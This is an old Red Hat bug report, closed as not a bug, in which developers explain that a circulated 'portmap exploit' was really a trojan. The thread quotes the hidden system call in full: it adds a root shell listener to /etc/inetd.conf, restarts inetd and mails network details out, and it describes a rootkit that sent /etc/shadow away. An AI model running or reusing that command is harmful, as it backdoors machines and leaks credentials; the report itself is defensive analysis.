Bug 21183
Summary: | portmapper buffer overflow | ||
---|---|---|---|
Product: | [Retired] Red Hat Linux | Reporter: | Need Real Name <joe> |
Component: | portmap | Assignee: | Trond Eivind Glomsrxd <teg> |
Status: | CLOSED NOTABUG | QA Contact: | Aaron Brown <abrown> |
Severity: | medium | Docs Contact: | |
Priority: | medium | ||
Version: | 6.2 | CC: | pekkas |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | i386 | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | Bug Fix | |
Doc Text: | Story Points: | --- | |
Clone Of: | Environment: | ||
Last Closed: | 2000-11-22 09:15:03 UTC | Type: | --- |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: |
Description
Need Real Name
2000-11-21 15:56:22 UTC
This is no portmap exploit. There's a trojan hidden in the shellcode which tries to add a backdoor in /etc/inetd.conf. So, someone ran a trojan on your system? I'm not sure I understand what you're trying to report. I think he found the exploit from somewhere, decided to try it on a system or two but got trojaned himself.. The "exploit" script calls system with: /bin/echo "65139 stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf ; /bin/killall -1 inetd 2>&1 1>/dev/null ; /sbin/ifconfig -a | mail goat187 2>&1 2>/dev/null this system call is disguised as a pmap_proc_p call (and pmap_proc_p is defined as system). Apparently I did not read the comments close enough and did not see that it was a trojan. I've since found that we were rooted by a ftpd buffer overflow. The rootkit the attacker used added the root shell to inetd.conf and mailed the IP address and /etc/shadow of the machine. |